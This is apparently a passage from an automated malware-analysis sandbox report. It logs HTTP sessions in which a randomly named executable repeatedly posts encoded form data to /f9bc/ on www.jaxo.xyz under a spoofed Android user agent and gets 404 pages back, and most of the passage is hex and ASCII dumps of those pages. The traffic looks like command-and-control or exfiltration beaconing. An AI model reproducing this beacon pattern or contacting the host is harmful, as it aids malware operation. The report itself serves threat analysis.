                                      Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102
                                      Aug 26, 2024 18:28:45.342412949 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.44975666.29.149.180805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:47.273401022 CEST753OUTPOST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 47 54 70 58 65 50 32 68 55 61 6f 77 47 61 67 75 73 56 4d 74 65 49 51 64 52 49 76 70 6c 77 34 76 67 3d
                                      Data Ascii: 3L9l=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                                      Aug 26, 2024 18:28:47.842317104 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:47 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                      Aug 26, 2024 18:28:47.842742920 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                      Aug 26, 2024 18:28:47.842979908 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                      Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                      Aug 26, 2024 18:28:47.843014956 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                      Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                      Aug 26, 2024 18:28:47.843111992 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                      Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                      Aug 26, 2024 18:28:47.843123913 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                                      Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                                      Aug 26, 2024 18:28:47.843209028 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                      Aug 26, 2024 18:28:47.843220949 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                      Aug 26, 2024 18:28:47.843231916 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                      Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                      Aug 26, 2024 18:28:47.843249083 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                      Aug 26, 2024 18:28:47.847742081 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.44975766.29.149.180805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:49.816984892 CEST10835OUTPOST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 45 33 52 52 68 2b 63 78 6e 79 71 31 67 70 61 6d 6a 57 64 6d 66 6f 77 52 38 53 61 55 74 49 76 2b 72 56 47 6d 36 65 53 7a 45 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 63 68 41 4c 6c 51 42 43 47 6d 46 43 6f 53 48 46 44 47 6d 52 73 79 49 78 6b 46 79 59 4a 49 45 73 79 34 31 47 7a 54 69 56 50 4a 39 70 70 52 63 68 55 31 72 49 37 67 75 69 66 4a 34 45 41 6b 4e 36 46 76 53 42 39 76 37 49 4d 38 34 72 71 2b 73 39 52 64 62 [TRUNCATED]
                                      Data Ascii: 3L9l=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QE3RRh+cxnyq1gpamjWdmfowR8SaUtIv+rVGm6eSzETe/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcchALlQBCGmFCoSHFDGmRsyIxkFyYJIEsy41GzTiVPJ9ppRchU1rI7guifJ4EAkN6FvSB9v7IM84rq+s9RdbqQ4UXsjrbnuWdALFCLq5sBrWS1dJfgmGnCq6Pbe5pXXsVd2yR3/bZGhMIvS/CWEAcOhWnUhp4HN6UpjzaRH+NMCNJcLOsJWA0pZGp9IAVFHc2GbEJvIJ8Uw22Rsi4NiiPi7LaeEGYunIK/Dnea1OL/VgZ8Ku49v9A7dG221fDbiIrMpjPTV6Xnz8ODHAMWcSiwKHJaX3oxV1pA38tXB9WoFih3Wb1rBfGhN6vM/apC80roizY4FrshY1Nydu1q/e8f8sbTiEo4PC1W/GUSCMW+01UJKtVoDNd5fWXW3vyXrILDDsWqtWB0G1kvPL86eZBQc/UJC9ap8P4MwTF70uaBx06v6anyYW/U1s3kAmTici++KlbmQfIEkE52jiJjuloSRuWKhckRu3zx8ZtV1olz/CCWc9MdHj9cT+bMOd4HprglbJDe9V8fxZccttK90Bu4x40DVS5r9CNV2/LnWIM5UeqQf9I6+ulrKMslZDIkDPc9YqKDoDCSg4A2+2Qi1pnBhczhYekVCpalPelxSXqiM04OQACw3a+64aXDgMfbomY94ppArfkgZD3I01uByJQWQQci3Clsb31G5l4XDWcCDy0Xah7cI0s8/MPdY8vrHRt94EGa2cqrhpqOqpALGhez7GbQd+F0UyDNtoCdXTP3+5Va2oDvJn3T [TRUNCATED]
                                      Aug 26, 2024 18:28:50.436723948 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:50 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                      Aug 26, 2024 18:28:50.436754942 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                      Aug 26, 2024 18:28:50.436774969 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                      Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                      Aug 26, 2024 18:28:50.436785936 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                      Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                      Aug 26, 2024 18:28:50.436796904 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                      Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                      Aug 26, 2024 18:28:50.436810017 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                                      Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                                      Aug 26, 2024 18:28:50.436820984 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                      Aug 26, 2024 18:28:50.436834097 CEST224INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                                      Aug 26, 2024 18:28:50.436844110 CEST1236INData Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                                      Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                                      Aug 26, 2024 18:28:50.436856031 CEST224INData Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
                                      Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102
                                      Aug 26, 2024 18:28:50.441699982 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.44975866.29.149.180805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:52.362318993 CEST478OUTGET /f9bc/?3L9l=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:53.260545015 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:52 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
